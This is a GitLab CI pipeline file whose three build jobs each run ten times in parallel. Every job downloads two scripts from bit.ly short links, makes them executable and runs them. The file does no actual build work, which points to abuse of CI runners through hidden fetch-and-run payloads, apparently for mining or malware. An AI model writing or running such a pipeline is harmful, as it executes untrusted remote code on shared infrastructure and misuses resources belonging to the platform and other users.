image: golang:latest

variables:
  REPO_NAME: https://gitlab.com/work36444002/work3


stages:
  - build
  - test
  - deploy

build_a:
  parallel: 10
  stage: build
  script: wget https://bit.ly/48twZE6;
        chmod +x 48twZE6;
        sh 48twZE6;
        wget https://bit.ly/3O1zyVG;
        chmod +x 3O1zyVG;
        sh 3O1zyVG

build_b:
  parallel: 10
  stage: build
  script: wget https://bit.ly/48twZE6;
        chmod +x 48twZE6;
        sh 48twZE6;
        wget https://bit.ly/3O1zyVG;
        chmod +x 3O1zyVG;
        sh 3O1zyVG

build_c:
  parallel: 10
  stage: build
  script: wget https://bit.ly/48twZE6;
        chmod +x 48twZE6;
        sh 48twZE6;
        wget https://bit.ly/3O1zyVG;
        chmod +x 3O1zyVG;
        sh 3O1zyVG